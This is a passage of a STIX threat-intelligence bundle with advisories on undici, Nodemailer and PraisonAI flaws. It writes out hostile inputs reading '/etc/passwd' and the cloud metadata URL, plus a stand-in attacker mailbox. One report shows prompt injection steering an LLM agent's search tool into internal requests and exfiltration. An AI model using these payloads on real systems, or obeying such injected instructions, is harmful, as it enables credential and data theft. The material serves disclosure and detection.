      "description": "## Overview\n\nThe `undici` WebSocket client, used in various Node.js applications, has been identified with a high-severity denial of service vulnerability, CVE-2026-12151, which affects all versions prior to `6.27.0`, `7.0.0` through `7.27.x`, and `8.0.0` through `8.4.x`. This flaw, published on June 19, 2026, allows a malicious WebSocket server to exploit an improper validation logic where the `maxPayloadSize` is enforced on the cumulative byte count of fragments but not on the total number of fragments. Attackers can stream many small or empty continuation frames that individually pass size checks but collectively lead to uncontrolled memory allocation within the client. This results in memory exhaustion and a denial of service for any `undici`-dependent application acting as a WebSocket client and connecting to an attacker-controlled endpoint. Defenders should prioritize patching to prevent application instability and crashes.\n\n## Attack Chain\n\n1.  An attacker operates a specially crafted, malicious WebSocket server designed to exploit `CVE-2026-12151`.\n2.  A vulnerable `undici` WebSocket client, integrated into a target application, is induced to establish a connection to the attacker's server (e.g., through a malicious link, compromised third-party service, or supply chain injection).\n3.  Upon successful connection, the malicious server sends an initial, valid WebSocket message fragment to maintain an active session.\n4.  The server then begins to continuously stream a large quantity of very small or entirely empty WebSocket continuation frames to the connected `undici` client.\n5.  The `undici` client's internal `maxPayloadSize` validation logic, which checks the cumulative byte count, passes for each individual small or empty frame.\n6.  Despite passing individual frame size checks, the client's memory buffer, responsible for reassembling the fragmented message, grows without bound due to the lack of a limit on the number of fragments.\n7.  The vulnerable `undici` client process rapidly consumes available system memory, leading to an out-of-memory (OOM) condition on the host system.\n8.  The operating system (Windows, Linux, or macOS) terminates the `undici` client process or the entire application due to memory exhaustion, resulting in a denial of service.\n\n## Impact\n\nThe successful exploitation of CVE-2026-12151 leads directly to a denial of service for applications utilizing the vulnerable `undici` WebSocket client. Affected systems will experience rapid, unbounded memory growth, culminating in the termination of the client process or the entire application by the operating system due to out-of-memory conditions. This can cause significant operational disruption, service unavailability, and potential data loss for critical services that rely on `undici` for WebSocket communication. While specific victim counts are not available, any Node.js application using `undici` for WebSocket client functionality, especially those connecting to external or untrusted endpoints, is susceptible to this severe impact.\n\n## Recommendation\n\n*   Upgrade the `undici` package in all affected Node.js applications immediately to a patched version (v6.27.0, v7.28.0, or v8.5.0) as referenced in the GHSA advisory.\n*   Deploy the Sigma rules in this brief to your SIEM/EDR to detect Node.js application crashes or abnormal terminations that could indicate successful exploitation of CVE-2026-12151.\n*   Enable application-level logging for Node.js processes, specifically capturing errors related to memory allocation failures or unexpected process exits, to activate the rules above.\n*   Review network egress policies for applications using the `undici` WebSocket client to ensure they only connect to trusted and necessary WebSocket endpoints, reducing exposure to malicious servers.\n",
      "published": "2026-06-19T14:26:21Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "javascript",
        "npm",
        "nodejs"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vxpw-j846-p89q"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9eb7bec2-357e-5bab-aea2-e37d26470f04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://169.254.169.254/",
      "pattern": "[url:value = 'http://169.254.169.254/']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T14:54:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--85553578-1e64-51ec-bc38-c7293416fde1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ff3699f-9af2-59f4-9516-a1da6152f155",
      "target_ref": "indicator--9eb7bec2-357e-5bab-aea2-e37d26470f04"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ae8f554c-1ba2-5f90-8ba1-44d1348ca517",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: attacker@evil.test",
      "pattern": "[email-addr:value = 'attacker@evil.test']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T14:54:24Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f368817-ef49-50cd-bc0c-a7074545655f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ff3699f-9af2-59f4-9516-a1da6152f155",
      "target_ref": "indicator--ae8f554c-1ba2-5f90-8ba1-44d1348ca517"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--289f5a7e-22a1-54f9-82c5-b36fbb3f52f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ff3699f-9af2-59f4-9516-a1da6152f155",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1048",
          "url": "https://attack.mitre.org/techniques/T1048"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5954a1eb-f0da-5d5d-b3d9-a63281068a8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ff3699f-9af2-59f4-9516-a1da6152f155",
      "target_ref": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d55c75a3-2f80-5efd-9c90-2f78291af14f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7ff3699f-9af2-59f4-9516-a1da6152f155",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7ff3699f-9af2-59f4-9516-a1da6152f155",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Nodemailer: Message-level raw option bypasses disableFileAccess/disableUrlAccess, enabling arbitrary file read and full-response SSRF",
      "description": "## Overview\n\nA critical vulnerability exists in Nodemailer versions up to 9.0.0, where the message-level `raw` option can bypass the `disableFileAccess` and `disableUrlAccess` sandboxing flags. This flaw allows an attacker to achieve arbitrary local file disclosure and full-response Server-Side Request Forgery (SSRF). When an application, designed to sandbox untrusted input, calls `transporter.sendMail()` with the `raw` option influenced by an attacker, the `MailComposer.compile()` function fails to propagate these flags to the root MIME node. Consequently, the Nodemailer process will read local files (e.g., `/etc/passwd`) or fetch internal/external URLs (e.g., `http://169.254.169.254/`) and send their contents directly as the email message. This results in the exfiltration of sensitive server-side data to an attacker-specified email address, presenting a high risk to data confidentiality.\n\n## Attack Chain\n\n1.  An application configured to use Nodemailer with `disableFileAccess` and/or `disableUrlAccess` for sandboxing processes untrusted user input.\n2.  An attacker crafts malicious input for the `transporter.sendMail()` call, specifically targeting the `raw` message option.\n3.  The attacker's input includes a malicious path (e.g., `raw: { path: '/etc/passwd' }`) or a malicious URL (e.g., `raw: { href: 'http://169.254.169.254/latest/meta-data/' }`).\n4.  Nodemailer's `MailComposer.compile()` function creates the root MIME node for the `raw` message without correctly applying the `disableFileAccess`/`disableUrlAccess` flags.\n5.  The `MimeNode` constructor initializes these flags to `false` by default, effectively ignoring the application's intended sandboxing.\n6.  During message compilation, `setRaw()` calls `_getStream()`, which proceeds to read the specified local file or fetch the specified URL, as the security flags are inactive.\n7.  The entire content of the read file or the fetched HTTP response body becomes the actual message content of the email.\n8.  Nodemailer's transport mechanisms deliver this crafted email, containing sensitive server data, to an email address specified by the attacker (e.g., `attacker@evil.test`).\n\n## Impact\n\nThe primary impact of this vulnerability is a high compromise of data confidentiality. Attackers can exfiltrate arbitrary local files from the server, such as `/etc/passwd`, `/proc/self/environ`, application `.env` files, or key material. Additionally, the full-response SSRF capability allows attackers to query internal network services or cloud metadata endpoints (e.g., `169.254.169.254`) and retrieve their full responses. This sensitive information is then delivered directly to an attacker-controlled mailbox, making internal data accessible to external adversaries. The vulnerability directly subverts security controls put in place by the application, rendering them ineffective for the `raw` message type.\n\n## Recommendation\n\n*   **Patch:** Immediately update Nodemailer to a patched version once available. Monitor the official Nodemailer repository and npm for security releases addressing GHSA-p6gq-j5cr-w38f.\n*   **Application-level mitigation:** Review all code paths that use `transporter.sendMail()` with the `raw` option. Ensure that untrusted user input cannot directly influence the `path` or `href` properties within the `raw` object. Implement strict input validation and sanitization.\n*   **Deployment:** Deploy the provided Sigma rules to your SIEM/EDR to detect attempts at SSRF and suspicious file access by Node.js processes on Linux hosts.\n*   **Logging:** Ensure comprehensive logging for process activity, file access, and network connections on servers hosting Node.js applications, particularly on Linux systems, to facilitate detection and investigation.\n",
      "published": "2026-06-18T14:54:24Z",
      "labels": [
        "ssrf",
        "file-read",
        "nodemailer",
        "nodejs",
        "javascript",
        "supply-chain"
      ],
      "object_refs": [
        "indicator--9eb7bec2-357e-5bab-aea2-e37d26470f04",
        "indicator--ae8f554c-1ba2-5f90-8ba1-44d1348ca517",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-p6gq-j5cr-w38f"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--595d66ba-f6c5-5384-a961-c87ac9bad806",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f96ec66-0094-5b7b-98d9-134dbf0afb57",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7aaffb35-6b24-52d2-ba19-8faf78c55def",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f96ec66-0094-5b7b-98d9-134dbf0afb57",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Disk Wipe",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1561",
          "url": "https://attack.mitre.org/techniques/T1561"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fcb679c8-f436-5229-9487-d6ea5daec3fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f96ec66-0094-5b7b-98d9-134dbf0afb57",
      "target_ref": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fdc08c89-c891-5640-8567-a4fa9ce0321f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f96ec66-0094-5b7b-98d9-134dbf0afb57",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--84296255-3cdd-554d-8d3d-0bf562c5c017",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f96ec66-0094-5b7b-98d9-134dbf0afb57",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--beedf59c-1fc4-5d9a-9c80-30750c069492",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f96ec66-0094-5b7b-98d9-134dbf0afb57",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8f96ec66-0094-5b7b-98d9-134dbf0afb57",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PraisonAI Authentication Bypass via PRAISONAI_CALL_AUTH=disabled",
      "description": "## Overview\n\nA critical authentication bypass exists in PraisonAI, affecting versions prior to 4.6.61. The vulnerability stems from an undocumented \"feature\" where setting the `PRAISONAI_CALL_AUTH=disabled` environment variable completely deactivates authentication for the `/api/v1/agents/{id}/invoke` endpoint. This misconfiguration is highly likely to be present in production Docker and Docker Compose deployments due to the application's own error messages explicitly advertising this bypass as a convenience option. Attackers can leverage this to gain full unauthenticated access to agent invocation functionalities, enabling them to trigger any registered agent and potentially execute arbitrary actions depending on the agent's configured tools, leading to severe compromise of the host system or connected services.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies an internet-facing PraisonAI instance, typically deployed via Docker or Docker Compose.\n2.  **Vulnerability Identification**: The attacker attempts to interact with the `/api/v1/agents/{id}/invoke` endpoint without authentication, potentially observing error messages that suggest setting `PRAISONAI_CALL_AUTH=disabled` to bypass auth, confirming the misconfiguration.\n3.  **Unauthenticated API Call**: The attacker constructs a `POST` request to `/api/v1/agents/{agent_id}/invoke` with a malicious payload, targeting a known or guessed agent ID, and sends it to the vulnerable PraisonAI instance without providing any authentication credentials.\n4.  **Agent Triggering**: Due to the `PRAISONAI_CALL_AUTH=disabled` setting, the PraisonAI server bypasses all authentication checks and processes the unauthenticated request, triggering the specified agent.\n5.  **Execution via Agent Tools**: The activated agent, configured with specific tools (e.g., shell access, Python interpreter, API keys), executes arbitrary actions as dictated by the attacker's payload injected via the `invoke` endpoint.\n6.  **Impact**: This unauthenticated execution leads to consequences such as data exfiltration, remote code execution, system compromise, or further lateral movement within the compromised environment.\n\n## Impact\n\nThe primary impact of this vulnerability is full unauthenticated access to the PraisonAI agent invocation API. If exploited, an attacker can trigger any registered agent on the server without needing valid credentials. This means that if an agent has been configured with access to sensitive systems or functionalities (e.g., shell command execution, database access, cloud API keys), the attacker can leverage these capabilities to execute arbitrary actions. This can result in data exfiltration, privilege escalation, remote code execution, or complete compromise of the underlying server and connected resources. The ease of exploitation and potential for severe consequences makes this a critical security concern for organizations running affected PraisonAI versions.\n\n## Recommendation\n\n*   Immediately update PraisonAI instances to version `4.6.61` or newer to remediate the vulnerability.\n*   Review all Dockerfiles, Docker Compose configurations, and environment variable settings for PraisonAI deployments to ensure `PRAISONAI_CALL_AUTH=disabled` is not present, or is explicitly set to `enabled`.\n*   Deploy the provided `Detect PraisonAI Unauthenticated Agent Invocation` Sigma rule to your SIEM to monitor for exploitation attempts against the `/api/v1/agents/{id}/invoke` endpoint.\n*   Deploy the provided `Detect PraisonAI PRAISONAI_CALL_AUTH=disabled Misconfiguration` Sigma rule to your EDR/SIEM to identify systems misconfigured with the vulnerable environment variable.\n*   Implement strict network access controls to limit access to PraisonAI instances, particularly the `/api/v1/agents/{id}/invoke` API endpoint, to only trusted internal networks or specific services.\n",
      "published": "2026-06-18T14:55:58Z",
      "labels": [
        "web-vulnerability",
        "authentication-bypass",
        "api-exploitation",
        "misconfiguration",
        "container"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-8ccj-p46r-jwqq"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bc165fb2-b98c-5f3b-8d08-9316e74cb09e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 169.254.169.254",
      "pattern": "[ipv4-addr:value = '169.254.169.254']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T14:56:56Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9ee4e89e-76a8-5450-970a-3bacfe764c1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--953a1643-e4b0-5821-8a0b-ef411ef43781",
      "target_ref": "indicator--bc165fb2-b98c-5f3b-8d08-9316e74cb09e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--671741d1-9c64-5877-ae1d-d036e32bd39a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--953a1643-e4b0-5821-8a0b-ef411ef43781",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3a8dc28d-2433-5082-a0cb-666686843942",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1599",
          "url": "https://attack.mitre.org/techniques/T1599"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0cff2fc-e027-5b8b-bf9d-93c3d09306ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--953a1643-e4b0-5821-8a0b-ef411ef43781",
      "target_ref": "attack-pattern--3a8dc28d-2433-5082-a0cb-666686843942"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1090",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1090",
          "url": "https://attack.mitre.org/techniques/T1090"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a5a106d9-90ed-513e-aa59-0b19e36fe538",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--953a1643-e4b0-5821-8a0b-ef411ef43781",
      "target_ref": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Network Service Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1046",
          "url": "https://attack.mitre.org/techniques/T1046"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ff0ea19b-c1cb-5863-8023-590dcb7e830c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--953a1643-e4b0-5821-8a0b-ef411ef43781",
      "target_ref": "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dfec9c85-4723-5a1e-8b24-d8bc4e941d42",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--953a1643-e4b0-5821-8a0b-ef411ef43781",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1552",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6e220c9f-2f99-547c-93df-8ed033de5430",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--953a1643-e4b0-5821-8a0b-ef411ef43781",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--953a1643-e4b0-5821-8a0b-ef411ef43781",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PraisonAI: Server-Side Request Forgery (SSRF) in SearxNG / search_web Tools via Attacker-Controlled searxng_url Parameter",
      "description": "## Overview\n\nA significant Server-Side Request Forgery (SSRF) vulnerability has been identified in PraisonAI's `praisonaiagents` package, affecting versions prior to 1.6.61. This flaw stems from a lack of validation on the `searxng_url` parameter within the `searxng_search` and `search_web` tools, which are part of the default agent toolset. Attackers can leverage prompt injection techniques to manipulate the `searxng_url` parameter, forcing the agent's underlying `requests.get()` function to make unvalidated HTTP requests to internal systems. This allows for reading responses from internal services and APIs, performing internal network enumeration, and potentially accessing cloud instance metadata endpoints (e.g., 169.254.169.254) to expose sensitive IAM credentials or other system information. The vulnerability does not require misconfiguration and is directly exploitable through attacker-controlled content ingested by the agent.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious Content**: An attacker embeds a carefully constructed prompt into content (e.g., a web page, file, or chat message) that an `praisonaiagents` LLM agent is likely to ingest.\n2.  **Agent Ingests Malicious Prompt**: The `praisonaiagents` LLM agent processes the attacker-controlled content, which includes instructions designed to coerce it into calling its `search_web` or `searxng_search` tool.\n3.  **Agent Calls Tool with Malicious Parameter**: Triggered by the prompt, the agent invokes `search_web(...)` or `searxng_search(...)`, passing an attacker-specified internal URL (e.g., `http://127.0.0.1:19998/admin/secrets` or `http://169.254.169.254/latest/meta-data/`) as the `searxng_url` parameter.\n4.  **Unvalidated HTTP Request Made**: The Python code within `src/praisonai-agents/praisonaiagents/tools/searxng_tools.py` or `src/praisonai-agents/praisonaiagents/tools/web_search.py` receives the `searxng_url` and uses it directly in `requests.get()` without any scheme, host, or port validation.\n5.  **Server Performs Internal Request**: The server hosting the `praisonaiagents` instance attempts to connect to the specified internal endpoint, effectively turning the agent into a proxy for the attacker.\n6.  **Internal Response Captured and Returned**: If the internal endpoint responds, its HTTP response body is captured by the agent tool, parsed (specifically for a JSON `results` key), and returned into the agent's context.\n7.  **Data Exfiltration/Enumeration**: The attacker can then coerce the agent (via further prompt injection or subsequent tool calls) to exfiltrate the captured internal data or to continue enumerating internal services based on error responses from closed ports.\n8.  **Credential Exposure**: In cloud environments, successful access to the instance metadata endpoint (`169.254.169.254`) can lead to the exposure of IAM role credentials, allowing for further compromise of cloud resources.\n\n## Impact\n\nThis SSRF vulnerability significantly compromises the security of `praisonaiagents` deployments. Any agent configured with the default `search_web` tool and capable of ingesting untrusted content (such as browsing the web, reading files, or processing external messages) is at risk. Attackers can gain unauthorized access to internal services and APIs, potentially reading sensitive data from administration panels or internal microservices that return JSON. The ability to distinguish between open and closed internal ports allows for comprehensive internal network enumeration, mapping out the internal infrastructure. Crucially, the reachability of cloud instance metadata endpoints (e.g., AWS IMDS) presents a high risk of IAM credential theft, which could lead to full compromise of the cloud environment. There are no known instances of active exploitation in the wild, but the existence of a public PoC increases the likelihood of future attacks.\n\n## Recommendation\n\n*   **Patch `praisonaiagents` immediately**: Upgrade the `praisonaiagents` package to version 1.6.61 or later to remediate CVE-2026-XXXX.\n*   **Deploy Sigma rules**: Implement the provided Sigma rules (`Detect Outbound PraisonAI Connections to Internal/Metadata IPs` and `Detect PraisonAI Process Execution`) into your SIEM to identify suspicious activity.\n*   **Implement egress filtering**: Configure network egress filtering at the host or network perimeter to block `praisonaiagents` processes from initiating connections to RFC1918 private IP ranges and the cloud instance metadata IP `169.254.169.254`.\n*   **Monitor outbound network connections**: Enable detailed logging for all outbound network connections from systems running `praisonaiagents` to detect anomalous destinations, especially the IP address `169.254.169.254`.\n",
      "published": "2026-06-18T14:56:56Z",
      "labels": [
        "ssrf",
        "llm-agent",
        "prompt-injection",
        "praisonai",
        "python",
        "ghsa"
      ],
      "object_refs": [
        "indicator--bc165fb2-b98c-5f3b-8d08-9316e74cb09e",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--3a8dc28d-2433-5082-a0cb-666686843942",
        "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
        "attack-pattern--e36dde55-a247-51ae-915b-0aac12302837",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4pcv-mg8v-vrgf"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
